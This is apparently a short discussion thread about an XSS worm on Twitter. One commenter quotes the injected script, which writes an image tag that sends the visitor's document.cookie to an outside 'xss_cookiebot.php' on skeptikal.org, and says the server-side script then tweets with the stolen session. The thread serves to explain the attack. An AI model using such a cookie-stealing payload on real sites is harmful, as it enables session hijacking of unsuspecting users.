

Twitter XSS (do not click that bit.ly link) - timf
http://twitter.com/mckt_/status/23140258045

======
js4all
It's a classical cookie stealing attack by injecting an image tag into a
twitter search api call.

    
    
            <script>
            document.location="http://dev.twitter.com/search?query==</script>
            <script>
            document.write(<img src="http://skeptikal.org/exploits/twitter/xss_cookiebot.php?" + document.cookie + ">");
            </script>
    

Once the cookiebot has the session cookie it tweets. That stuff is done
server-side in the xss_cookiebot.php PHP script.

------
tlack
Analysis of how this works?

